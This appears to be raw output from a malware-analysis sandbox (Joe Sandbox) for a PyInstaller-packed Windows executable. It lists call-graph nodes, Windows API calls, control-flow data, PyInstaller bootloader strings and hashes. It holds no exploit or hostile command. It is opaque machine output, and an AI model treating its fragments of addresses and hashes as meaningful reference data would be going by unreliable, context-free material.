17820->17818 17829 7ff7691b4480 17822->17829 17823 7ff7691b3e11 17826 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17823->17826 17824 7ff7691b3e60 17824->17817 17825 7ff7691b3e6a 17824->17825 17828 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17825->17828 17826->17818 17827 7ff7691b3e08 17827->17817 17827->17823 17828->17818 17830 7ff7691ba5d8 _set_fmode 11 API calls 17829->17830 17831 7ff7691b4497 17830->17831 17832 7ff7691a27df 17831->17832 17833 7ff7691bdea8 _set_fmode 11 API calls 17831->17833 17835 7ff7691b44d7 17831->17835 17832->17770 17834 7ff7691b44cc 17833->17834 17836 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17834->17836 17835->17832 17976 7ff7691bdf30 17835->17976 17836->17835 17839 7ff7691b9c10 _isindst 17 API calls 17840 7ff7691b451c 17839->17840 17842 7ff7691b1f6e 17841->17842 17843 7ff7691b1f5e 17841->17843 17844 7ff7691b1f77 17842->17844 17851 7ff7691b1fa5 17842->17851 17846 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17843->17846 17847 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17844->17847 17845 7ff7691b1f9d 17845->17817 17845->17823 17845->17824 17845->17827 17846->17845 17847->17845 17848 7ff7691b3ae0 45 API calls 17848->17851 17850 7ff7691b2254 17853 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17850->17853 17851->17843 17851->17845 17851->17848 17851->17850 17855 7ff7691b28c0 17851->17855 17881 7ff7691b2588 17851->17881 17911 7ff7691b1e10 17851->17911 17853->17843 17856 7ff7691b2902 17855->17856 17857 7ff7691b2975 17855->17857 17858 7ff7691b299f 17856->17858 17859 7ff7691b2908 17856->17859 17860 7ff7691b29cf 17857->17860 17861 7ff7691b297a 17857->17861 17928 7ff7691b0e70 17858->17928 17866 7ff7691b290d 17859->17866 17869 7ff7691b29de 17859->17869 17860->17858 17860->17869 17879 7ff7691b2938 17860->17879 17862 7ff7691b29af 17861->17862 17863 7ff7691b297c 17861->17863 17935 7ff7691b0a60 17862->17935 17865 7ff7691b291d 17863->17865 17872 7ff7691b298b 17863->17872 17880 7ff7691b2a0d 17865->17880 17914 7ff7691b3224 17865->17914 17866->17865 17870 7ff7691b2950 17866->17870 17866->17879 17869->17880 17942 7ff7691b1280 17869->17942 17870->17880 17924 7ff7691b36e0 17870->17924 17872->17858 17874 7ff7691b2990 17872->17874 17876 7ff7691b3878 37 API calls 17874->17876 17874->17880 17875 7ff7691ab870 _log10_special 8 API calls 17877 7ff7691b2ca3 17875->17877 17876->17879 17877->17851 17879->17880 17949 7ff7691bdb68 17879->17949 17880->17875 17882 7ff7691b2593 17881->17882 17883 7ff7691b25a9 17881->17883 17884 7ff7691b2902 17882->17884 17885 7ff7691b2975 17882->17885 17887 7ff7691b25e7 17882->17887 17886 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17883->17886 17883->17887 17888 7ff7691b299f 17884->17888 17889 7ff7691b2908 17884->17889 17890 7ff7691b29cf 17885->17890 17891 7ff7691b297a 17885->17891 17886->17887 17887->17851 17894 7ff7691b0e70 38 API calls 17888->17894 17898 7ff7691b290d 17889->17898 17900 7ff7691b29de 17889->17900 17890->17888 17890->17900 17909 7ff7691b2938 17890->17909 17892 7ff7691b29af 17891->17892 17893 7ff7691b297c 17891->17893 17896 7ff7691b0a60 38 API calls 17892->17896 17895 7ff7691b291d 17893->17895 17902 7ff7691b298b 17893->17902 17894->17909 17897 7ff7691b3224 47 API calls 17895->17897 17910 7ff7691b2a0d 17895->17910 17896->17909 17897->17909 17898->17895 17899 7ff7691b2950 17898->17899 17898->17909 17903 7ff7691b36e0 47 API calls 17899->17903 17899->17910 17901 7ff7691b1280 38 API calls 17900->17901 17900->17910 17901->17909 17902->17888 17904 7ff7691b2990 17902->17904 17903->17909 17906 7ff7691b3878 37 API calls 17904->17906 17904->17910 17905 7ff7691ab870 _log10_special 8 API calls 17907 7ff7691b2ca3 17905->17907 17906->17909 17907->17851 17908 7ff7691bdb68 47 API calls 17908->17909 17909->17908 17909->17910 17910->17905 17959 7ff7691b0034 17911->17959 17915 7ff7691b3246 17914->17915 17916 7ff7691afea0 12 API calls 17915->17916 17917 7ff7691b328e 17916->17917 17918 7ff7691bd880 46 API calls 17917->17918 17919 7ff7691b3361 17918->17919 17920 7ff7691b3383 17919->17920 17921 7ff7691b3ae0 45 API calls 17919->17921 17922 7ff7691b3ae0 45 API calls 17920->17922 17923 7ff7691b340c 17920->17923 17921->17920 17922->17923 17923->17879 17925 7ff7691b36f8 17924->17925 17927 7ff7691b3760 17924->17927 17926 7ff7691bdb68 47 API calls 17925->17926 17925->17927 17926->17927 17927->17879 17929 7ff7691b0ea3 17928->17929 17930 7ff7691b0ed2 17929->17930 17932 7ff7691b0f8f 17929->17932 17931 7ff7691afea0 12 API calls 17930->17931 17934 7ff7691b0f0f 17930->17934 17931->17934 17933 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17932->17933 17933->17934 17934->17879 17936 7ff7691b0a93 17935->17936 17937 7ff7691b0ac2 17936->17937 17939 7ff7691b0b7f 17936->17939 17938 7ff7691afea0 12 API calls 17937->17938 17941 7ff7691b0aff 17937->17941 17938->17941 17940 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17939->17940 17940->17941 17941->17879 17943 7ff7691b12b3 17942->17943 17944 7ff7691b12e2 17943->17944 17946 7ff7691b139f 17943->17946 17945 7ff7691afea0 12 API calls 17944->17945 17948 7ff7691b131f 17944->17948 17945->17948 17947 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17946->17947 17947->17948 17948->17879 17950 7ff7691bdb90 17949->17950 17951 7ff7691b3ae0 45 API calls 17950->17951 17953 7ff7691bdbd5 17950->17953 17956 7ff7691bdb95 __scrt_get_show_window_mode 17950->17956 17958 7ff7691bdbbe __scrt_get_show_window_mode 17950->17958 17951->17953 17952 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17952->17956 17954 7ff7691bfaf8 WideCharToMultiByte 17953->17954 17953->17956 17953->17958 17955 7ff7691bdcb1 17954->17955 17955->17956 17957 7ff7691bdcc6 GetLastError 17955->17957 17956->17879 17957->17956 17957->17958 17958->17952 17958->17956 17960 7ff7691b0061 17959->17960 17961 7ff7691b0073 17959->17961 17962 7ff7691b43f4 _set_fmode 11 API calls 17960->17962 17964 7ff7691b0080 17961->17964 17967 7ff7691b00bd 17961->17967 17963 7ff7691b0066 17962->17963 17965 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 17963->17965 17966 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 17964->17966 17975 7ff7691b0071 17965->17975 17966->17975 17968 7ff7691b0166 17967->17968 17969 7ff7691b43f4 _set_fmode 11 API calls 17967->17969 17970 7ff7691b43f4 _set_fmode 11 API calls 17968->17970 17968->17975 17971 7ff7691b015b 17969->17971 17972 7ff7691b0210 17970->17972 17973 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 17971->17973 17974 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 17972->17974 17973->17968 17974->17975 17975->17851 17978 7ff7691bdf4d 17976->17978 17977 7ff7691bdf52 17979 7ff7691b44fd 17977->17979 17980 7ff7691b43f4 _set_fmode 11 API calls 17977->17980 17978->17977 17978->17979 17983 7ff7691bdf9c 17978->17983 17979->17832 17979->17839 17981 7ff7691bdf5c 17980->17981 17982 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 17981->17982 17982->17979 17983->17979 17984 7ff7691b43f4 _set_fmode 11 API calls 17983->17984 17984->17981 17986 7ff7691b7555 17985->17986 17987 7ff7691b7568 17985->17987 17988 7ff7691b43f4 _set_fmode 11 API calls 17986->17988 17995 7ff7691b71cc 17987->17995 17990 7ff7691b755a 17988->17990 17992 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 17990->17992 17993 7ff7691b7566 17992->17993 17993->17167 18002 7ff7691bf5e8 EnterCriticalSection 17995->18002 18004 7ff7691a7b91 GetTokenInformation 18003->18004 18005 7ff7691a7c13 __std_exception_copy 18003->18005 18006 7ff7691a7bb2 GetLastError 18004->18006 18007 7ff7691a7bbd 18004->18007 18008 7ff7691a7c26 CloseHandle 18005->18008 18009 7ff7691a7c2c 18005->18009 18006->18005 18006->18007 18007->18005 18010 7ff7691a7bd9 GetTokenInformation 18007->18010 18008->18009 18009->17176 18010->18005 18011 7ff7691a7bfc 18010->18011 18011->18005 18012 7ff7691a7c06 ConvertSidToStringSidW 18011->18012 18012->18005 18014 7ff7691a297a 18013->18014 18189 7ff7691a3f70 108 API calls 18188->18189 18190 7ff7691a1463 18189->18190 18191 7ff7691a148c 18190->18191 18192 7ff7691a146b 18190->18192 18193 7ff7691af9f4 73 API calls 18191->18193 18194 7ff7691a25f0 53 API calls 18192->18194 18195 7ff7691a14a1 18193->18195 18196 7ff7691a147b 18194->18196 18197 7ff7691a14c1 18195->18197 18198 7ff7691a14a5 18195->18198 18196->17235 18200 7ff7691a14f1 18197->18200 18201 7ff7691a14d1 18197->18201 18199 7ff7691a2760 53 API calls 18198->18199 18207 7ff7691a14bc __std_exception_copy 18199->18207 18204 7ff7691a14f7 18200->18204 18209 7ff7691a150a 18200->18209 18202 7ff7691a2760 53 API calls 18201->18202 18202->18207 18203 7ff7691af36c 74 API calls 18205 7ff7691a1584 18203->18205 18212 7ff7691a11f0 18204->18212 18205->17235 18207->18203 18208 7ff7691af6bc _fread_nolock 53 API calls 18208->18209 18209->18207 18209->18208 18210 7ff7691a1596 18209->18210 18211 7ff7691a2760 53 API calls 18210->18211 18211->18207 18213 7ff7691a1248 18212->18213 18214 7ff7691a124f 18213->18214 18215 7ff7691a1277 18213->18215 18216 7ff7691a25f0 53 API calls 18214->18216 18218 7ff7691a1291 18215->18218 18219 7ff7691a12ad 18215->18219 18217 7ff7691a1262 18216->18217 18217->18207 18220 7ff7691a2760 53 API calls 18218->18220 18221 7ff7691a12bf 18219->18221 18228 7ff7691a12db memcpy_s 18219->18228 18250 7ff7691a3f1a 18249->18250 18251 7ff7691a86b0 2 API calls 18250->18251 18252 7ff7691a3f3f 18251->18252 18253 7ff7691ab870 _log10_special 8 API calls 18252->18253 18254 7ff7691a3f67 18253->18254 18254->17257 18256 7ff7691a753e 18255->18256 18257 7ff7691a7662 18256->18257 18258 7ff7691a1bf0 49 API calls 18256->18258 18259 7ff7691ab870 _log10_special 8 API calls 18257->18259 18263 7ff7691a75c5 18258->18263 18260 7ff7691a7693 18259->18260 18260->17257 18261 7ff7691a1bf0 49 API calls 18261->18263 18262 7ff7691a3f10 10 API calls 18262->18263 18263->18257 18263->18261 18263->18262 18264 7ff7691a761b 18263->18264 18265 7ff7691a86b0 2 API calls 18264->18265 18266 7ff7691a7633 CreateDirectoryW 18265->18266 18266->18257 18266->18263 18268 7ff7691a15d3 18267->18268 18269 7ff7691a15f7 18267->18269 18356 7ff7691a1050 18268->18356 18270 7ff7691a3f70 108 API calls 18269->18270 18272 7ff7691a160b 18270->18272 18273 7ff7691a1613 18272->18273 18274 7ff7691a163b 18272->18274 18277 7ff7691a2760 53 API calls 18273->18277 18278 7ff7691a3f70 108 API calls 18274->18278 18275 7ff7691a15ee 18275->17257 18276 7ff7691a15d8 18276->18275 18279 7ff7691a25f0 53 API calls 18276->18279 18280 7ff7691a162a 18277->18280 18281 7ff7691a164f 18278->18281 18279->18275 18280->17257 18282 7ff7691a1671 18281->18282 18283 7ff7691a1657 18281->18283 18285 7ff7691af9f4 73 API calls 18282->18285 18284 7ff7691a25f0 53 API calls 18283->18284 18306 7ff7691a694b 18305->18306 18308 7ff7691a6904 18305->18308 18306->17257 18308->18306 18395 7ff7691b4250 18308->18395 18310 7ff7691a3b51 18309->18310 18311 7ff7691a3e90 49 API calls 18310->18311 18312 7ff7691a3b8b 18311->18312 18313 7ff7691a3e90 49 API calls 18312->18313 18314 7ff7691a3b9b 18313->18314 18315 7ff7691a3bec 18314->18315 18316 7ff7691a3bbd 18314->18316 18318 7ff7691a3ac0 51 API calls 18315->18318 18410 7ff7691a3ac0 18316->18410 18319 7ff7691a3bea 18318->18319 18320 7ff7691a3c17 18319->18320 18321 7ff7691a3c4c 18319->18321 18354 7ff7691a1bf0 49 API calls 18353->18354 18355 7ff7691a3e24 18354->18355 18355->17257 18357 7ff7691a3f70 108 API calls 18356->18357 18358 7ff7691a108b 18357->18358 18359 7ff7691a1093 18358->18359 18360 7ff7691a10a8 18358->18360 18361 7ff7691a25f0 53 API calls 18359->18361 18362 7ff7691af9f4 73 API calls 18360->18362 18367 7ff7691a10a3 __std_exception_copy 18361->18367 18363 7ff7691a10bd 18362->18363 18364 7ff7691a10c1 18363->18364 18365 7ff7691a10dd 18363->18365 18367->18276 18396 7ff7691b428a 18395->18396 18397 7ff7691b425d 18395->18397 18398 7ff7691b42ad 18396->18398 18401 7ff7691b42c9 18396->18401 18399 7ff7691b43f4 _set_fmode 11 API calls 18397->18399 18403 7ff7691b4214 18397->18403 18400 7ff7691b43f4 _set_fmode 11 API calls 18398->18400 18402 7ff7691b4267 18399->18402 18404 7ff7691b42b2 18400->18404 18405 7ff7691b4178 45 API calls 18401->18405 18406 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 18402->18406 18403->18308 18407 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 18404->18407 18409 7ff7691b42bd 18405->18409 18408 7ff7691b4272 18406->18408 18407->18409 18408->18308 18409->18308 18411 7ff7691a3ae6 18410->18411 18474 7ff7691b51d8 18473->18474 18475 7ff7691b51fe 18474->18475 18478 7ff7691b5231 18474->18478 18476 7ff7691b43f4 _set_fmode 11 API calls 18475->18476 18477 7ff7691b5203 18476->18477 18479 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 18477->18479 18480 7ff7691b5244 18478->18480 18481 7ff7691b5237 18478->18481 18491 7ff7691a3fc6 18479->18491 18492 7ff7691b9f38 18480->18492 18482 7ff7691b43f4 _set_fmode 11 API calls 18481->18482 18482->18491 18491->17287 18505 7ff7691bf5e8 EnterCriticalSection 18492->18505 18865 7ff7691b6c08 18864->18865 18868 7ff7691b66e4 18865->18868 18867 7ff7691b6c21 18867->17297 18869 7ff7691b66ff 18868->18869 18870 7ff7691b672e 18868->18870 18871 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 18869->18871 18878 7ff7691b477c EnterCriticalSection 18870->18878 18873 7ff7691b671f 18871->18873 18873->18867 18880 7ff7691af191 18879->18880 18881 7ff7691af163 18879->18881 18883 7ff7691af183 18880->18883 18889 7ff7691b477c EnterCriticalSection 18880->18889 18882 7ff7691b9b24 _invalid_parameter_noinfo 37 API calls 18881->18882 18882->18883 18883->17301 18891 7ff7691a86b0 2 API calls 18890->18891 18892 7ff7691a81b4 LoadLibraryExW 18891->18892 18893 7ff7691a81d3 __std_exception_copy 18892->18893 18893->17331 18895 7ff7691a6ef3 GetProcAddress 18894->18895 18896 7ff7691a6ec9 18894->18896 18895->18896 18897 7ff7691a6f18 GetProcAddress 18895->18897 18898 7ff7691a29e0 51 API calls 18896->18898 18897->18896 18899 7ff7691a6f3d GetProcAddress 18897->18899 18901 7ff7691a6ee3 18898->18901 18899->18896 18901->17338 18960 7ff7691a5b05 18959->18960 18961 7ff7691a1bf0 49 API calls 18960->18961 18962 7ff7691a5b41 18961->18962 18963 7ff7691a5b4a 18962->18963 18964 7ff7691a5b6d 18962->18964 18965 7ff7691a25f0 53 API calls 18963->18965 18966 7ff7691a3fe0 49 API calls 18964->18966 18982 7ff7691a5b63 18965->18982 18967 7ff7691a5b85 18966->18967 18968 7ff7691a5ba3 18967->18968 18970 7ff7691a25f0 53 API calls 18967->18970 18971 7ff7691a3f10 10 API calls 18968->18971 18969 7ff7691ab870 _log10_special 8 API calls 18972 7ff7691a308e 18969->18972 18970->18968 18973 7ff7691a5bad 18971->18973 18972->17371 18990 7ff7691a5c80 18972->18990 18974 7ff7691a5bbb 18973->18974 18976 7ff7691a81a0 3 API calls 18973->18976 18975 7ff7691a3fe0 49 API calls 18974->18975 18977 7ff7691a5bd4 18975->18977 18976->18974 18978 7ff7691a5bf9 18977->18978 18979 7ff7691a5bd9 18977->18979 18981 7ff7691a81a0 3 API calls 18978->18981 18980 7ff7691a25f0 53 API calls 18979->18980 18980->18982 18983 7ff7691a5c06 18981->18983 18982->18969 19129 7ff7691a4c80 18990->19129 18992 7ff7691a5cba 18993 7ff7691a5cc2 18992->18993 18994 7ff7691a5cd3 18992->18994 18995 7ff7691a25f0 53 API calls 18993->18995 19136 7ff7691a4450 18994->19136 19130 7ff7691a4cac 19129->19130 19131 7ff7691a4cb4 19130->19131 19132 7ff7691a4e54 19130->19132 19167 7ff7691b5db4 19130->19167 19131->18992 19133 7ff7691a5017 __std_exception_copy 19132->19133 19134 7ff7691a4180 47 API calls 19132->19134 19133->18992 19134->19132 19137 7ff7691a4480 19136->19137 19168 7ff7691b5de4 19167->19168 19171 7ff7691b52b0 19168->19171 19172 7ff7691b52e1 19171->19172 19173 7ff7691b52f3 19171->19173 19174 7ff7691b43f4 _set_fmode 11 API calls 19172->19174 19175 7ff7691b533d 19173->19175 19177 7ff7691b5300 19173->19177 19232->17374 20270 7ff7691c9ef3 20273 7ff7691c9f03 20270->20273 20274 7ff7691b4788 LeaveCriticalSection 20273->20274 19571 7ff7691abe70 19572 7ff7691abe80 19571->19572 19588 7ff7691b8ec0 19572->19588 19574 7ff7691abe8c 19594 7ff7691ac168 19574->19594 19576 7ff7691ac44c 7 API calls 19577 7ff7691abf25 19576->19577 19578 7ff7691abea4 _RTC_Initialize 19586 7ff7691abef9 19578->19586 19599 7ff7691ac318 19578->19599 19580 7ff7691abeb9 19602 7ff7691b832c 19580->19602 19586->19576 19587 7ff7691abf15 19586->19587 19589 7ff7691b8ed1 19588->19589 19590 7ff7691b8ed9 19589->19590 19591 7ff7691b43f4 _set_fmode 11 API calls 19589->19591 19590->19574 19592 7ff7691b8ee8 19591->19592 19593 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 19592->19593 19593->19590 19595 7ff7691ac179 19594->19595 19598 7ff7691ac17e __scrt_release_startup_lock 19594->19598 19596 7ff7691ac44c 7 API calls 19595->19596 19595->19598 19597 7ff7691ac1f2 19596->19597 19598->19578 19627 7ff7691ac2dc 19599->19627 19601 7ff7691ac321 19601->19580 19603 7ff7691b834c 19602->19603 19617 7ff7691abec5 19602->19617 19604 7ff7691b8354 19603->19604 19605 7ff7691b836a GetModuleFileNameW 19603->19605 19606 7ff7691b43f4 _set_fmode 11 API calls 19604->19606 19609 7ff7691b8395 19605->19609 19607 7ff7691b8359 19606->19607 19608 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 19607->19608 19608->19617 19610 7ff7691b82cc 11 API calls 19609->19610 19611 7ff7691b83d5 19610->19611 19612 7ff7691b83dd 19611->19612 19616 7ff7691b83f5 19611->19616 19613 7ff7691b43f4 _set_fmode 11 API calls 19612->19613 19614 7ff7691b83e2 19613->19614 19615 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19614->19615 19615->19617 19619 7ff7691b8443 19616->19619 19620 7ff7691b845c 19616->19620 19625 7ff7691b8417 19616->19625 19617->19586 19626 7ff7691ac3ec InitializeSListHead 19617->19626 19618 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19618->19617 19621 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19619->19621 19623 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19620->19623 19622 7ff7691b844c 19621->19622 19624 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19622->19624 19623->19625 19624->19617 19625->19618 19628 7ff7691ac2f6 19627->19628 19630 7ff7691ac2ef 19627->19630 19631 7ff7691b94fc 19628->19631 19630->19601 19634 7ff7691b9138 19631->19634 19641 7ff7691bf5e8 EnterCriticalSection 19634->19641

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 7ff7691a1000-7ff7691a3536 call 7ff7691af138 call 7ff7691af140 call 7ff7691abb70 call 7ff7691b4700 call 7ff7691b4794 call 7ff7691a33e0 14 7ff7691a3544-7ff7691a3566 call 7ff7691a18f0 0->14 15 7ff7691a3538-7ff7691a353f 0->15 21 7ff7691a3736-7ff7691a374c call 7ff7691a3f70 14->21 22 7ff7691a356c-7ff7691a3583 call 7ff7691a1bf0 14->22 16 7ff7691a371a-7ff7691a3735 call 7ff7691ab870 15->16 27 7ff7691a3785-7ff7691a379a call 7ff7691a25f0 21->27 28 7ff7691a374e-7ff7691a377b call 7ff7691a76a0 21->28 26 7ff7691a3588-7ff7691a35c1 22->26 29 7ff7691a3653-7ff7691a366d call 7ff7691a7e10 26->29 30 7ff7691a35c7-7ff7691a35cb 26->30 41 7ff7691a3712 27->41 45 7ff7691a379f-7ff7691a37be call 7ff7691a1bf0 28->45 46 7ff7691a377d-7ff7691a3780 call 7ff7691af36c 28->46 42 7ff7691a366f-7ff7691a3675 29->42 43 7ff7691a3695-7ff7691a369c 29->43 33 7ff7691a3638-7ff7691a364d call 7ff7691a18e0 30->33 34 7ff7691a35cd-7ff7691a35e5 call 7ff7691b4560 30->34 33->29 33->30 50 7ff7691a35f2-7ff7691a360a call 7ff7691b4560 34->50 51 7ff7691a35e7-7ff7691a35eb 34->51 41->16 48 7ff7691a3682-7ff7691a3690 call 7ff7691b415c 42->48 49 7ff7691a3677-7ff7691a3680 42->49 53 7ff7691a36a2-7ff7691a36c0 call 7ff7691a7e10 call 7ff7691a7f80 43->53 54 7ff7691a3844-7ff7691a3863 call 7ff7691a3e90 43->54 61 7ff7691a37c1-7ff7691a37ca 45->61 46->27 48->43 49->48 66 7ff7691a3617-7ff7691a362f call 7ff7691b4560 50->66 67 7ff7691a360c-7ff7691a3610 50->67 51->50 79 7ff7691a380f-7ff7691a381e call 7ff7691a8400 53->79 80 7ff7691a36c6-7ff7691a36c9 53->80 69 7ff7691a3871-7ff7691a3882 call 7ff7691a1bf0 54->69 70 7ff7691a3865-7ff7691a386f call 7ff7691a3fe0 54->70 61->61 65 7ff7691a37cc-7ff7691a37e9 call 7ff7691a18f0 61->65 65->26 84 7ff7691a37ef-7ff7691a3800 call 7ff7691a25f0 65->84 66->33 85 7ff7691a3631 66->85 67->66 76 7ff7691a3887-7ff7691a38a1 call 7ff7691a86b0 69->76 70->76 93 7ff7691a38af-7ff7691a38c1 SetDllDirectoryW 76->93 94 7ff7691a38a3 76->94 91 7ff7691a3820 79->91 92 7ff7691a382c-7ff7691a382f call 7ff7691a7c40 79->92 80->79 86 7ff7691a36cf-7ff7691a36f6 call 7ff7691a1bf0 80->86 84->41 85->33 97 7ff7691a3805-7ff7691a380d call 7ff7691b415c 86->97 98 7ff7691a36fc-7ff7691a3703 call 7ff7691a25f0 86->98 91->92 103 7ff7691a3834-7ff7691a3836 92->103 100 7ff7691a38d0-7ff7691a38ec call 7ff7691a6560 call 7ff7691a6b00 93->100 101 7ff7691a38c3-7ff7691a38ca 93->101 94->93 97->76 107 7ff7691a3708-7ff7691a370a 98->107 118 7ff7691a3947-7ff7691a394a call 7ff7691a6510 100->118 119 7ff7691a38ee-7ff7691a38f4 100->119 101->100 104 7ff7691a3a50-7ff7691a3a58 101->104 103->76 110 7ff7691a3838 103->110 108 7ff7691a3a5a-7ff7691a3a77 PostMessageW GetMessageW 104->108 109 7ff7691a3a7d-7ff7691a3aaf call 7ff7691a33d0 call 7ff7691a3080 call 7ff7691a33a0 call 7ff7691a6780 call 7ff7691a6510 104->109 107->41 108->109 110->54 124 7ff7691a394f-7ff7691a3956 118->124 121 7ff7691a38f6-7ff7691a3903 call 7ff7691a65a0 119->121 122 7ff7691a390e-7ff7691a3918 call 7ff7691a6970 119->122 121->122 132 7ff7691a3905-7ff7691a390c 121->132 134 7ff7691a3923-7ff7691a3931 call 7ff7691a6cd0 122->134 135 7ff7691a391a-7ff7691a3921 122->135 124->104 129 7ff7691a395c-7ff7691a3966 call 7ff7691a30e0 124->129 129->107 141 7ff7691a396c-7ff7691a3980 call 7ff7691a83e0 129->141 137 7ff7691a393a-7ff7691a3942 call 7ff7691a2870 call 7ff7691a6780 132->137 134->124 146 7ff7691a3933 134->146 135->137 137->118 151 7ff7691a3982-7ff7691a399f PostMessageW GetMessageW 141->151 152 7ff7691a39a5-7ff7691a39e8 call 7ff7691a7f20 call 7ff7691a7fc0 call 7ff7691a6780 call 7ff7691a6510 call 7ff7691a7ec0 141->152 146->137 151->152 163 7ff7691a39ea-7ff7691a3a00 call 7ff7691a81f0 call 7ff7691a7ec0 152->163 164 7ff7691a3a3d-7ff7691a3a4b call 7ff7691a18a0 152->164 163->164 171 7ff7691a3a02-7ff7691a3a10 163->171 164->107 172 7ff7691a3a12-7ff7691a3a2c call 7ff7691a25f0 call 7ff7691a18a0 171->172 173 7ff7691a3a31-7ff7691a3a38 call 7ff7691a2870 171->173 172->107 173->164
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName
                                                                                                    • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                    • API String ID: 514040917-585287483
                                                                                                    • Opcode ID: 50fc1386d512d691390c5b157662d05eacb50b5d0978dddca11a68ca0d5b27cb
                                                                                                    • Instruction ID: bde7d7aa7b3e13d47e0e1640368fcfe0862a14d4bc14e43a798d12d16ef09090
                                                                                                    • Opcode Fuzzy Hash: 50fc1386d512d691390c5b157662d05eacb50b5d0978dddca11a68ca0d5b27cb
                                                                                                    • Instruction Fuzzy Hash: 2EF15C21B08682D1FA1DFF21B5543B9E271AF54790FE44432DA5D83AD6EF2CE95AC320

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 335 7ff7691c5c74-7ff7691c5ce7 call 7ff7691c59a8 338 7ff7691c5d01-7ff7691c5d0b call 7ff7691b7830 335->338 339 7ff7691c5ce9-7ff7691c5cf2 call 7ff7691b43d4 335->339 344 7ff7691c5d26-7ff7691c5d8f CreateFileW 338->344 345 7ff7691c5d0d-7ff7691c5d24 call 7ff7691b43d4 call 7ff7691b43f4 338->345 346 7ff7691c5cf5-7ff7691c5cfc call 7ff7691b43f4 339->346 349 7ff7691c5d91-7ff7691c5d97 344->349 350 7ff7691c5e0c-7ff7691c5e17 GetFileType 344->350 345->346 357 7ff7691c6042-7ff7691c6062 346->357 355 7ff7691c5dd9-7ff7691c5e07 GetLastError call 7ff7691b4368 349->355 356 7ff7691c5d99-7ff7691c5d9d 349->356 352 7ff7691c5e6a-7ff7691c5e71 350->352 353 7ff7691c5e19-7ff7691c5e54 GetLastError call 7ff7691b4368 CloseHandle 350->353 360 7ff7691c5e73-7ff7691c5e77 352->360 361 7ff7691c5e79-7ff7691c5e7c 352->361 353->346 369 7ff7691c5e5a-7ff7691c5e65 call 7ff7691b43f4 353->369 355->346 356->355 362 7ff7691c5d9f-7ff7691c5dd7 CreateFileW 356->362 367 7ff7691c5e82-7ff7691c5ed7 call 7ff7691b7748 360->367 361->367 368 7ff7691c5e7e 361->368 362->350 362->355 374 7ff7691c5ef6-7ff7691c5f27 call 7ff7691c5728 367->374 375 7ff7691c5ed9-7ff7691c5ee5 call 7ff7691c5bb0 367->375 368->367 369->346 381 7ff7691c5f29-7ff7691c5f2b 374->381 382 7ff7691c5f2d-7ff7691c5f6f 374->382 375->374 380 7ff7691c5ee7 375->380 383 7ff7691c5ee9-7ff7691c5ef1 call 7ff7691b9dd0 380->383 381->383 384 7ff7691c5f91-7ff7691c5f9c 382->384 385 7ff7691c5f71-7ff7691c5f75 382->385 383->357 388 7ff7691c5fa2-7ff7691c5fa6 384->388 389 7ff7691c6040 384->389 385->384 387 7ff7691c5f77-7ff7691c5f8c 385->387 387->384 388->389 391 7ff7691c5fac-7ff7691c5ff1 CloseHandle CreateFileW 388->391 389->357 392 7ff7691c6026-7ff7691c603b 391->392 393 7ff7691c5ff3-7ff7691c6021 GetLastError call 7ff7691b4368 call 7ff7691b7970 391->393 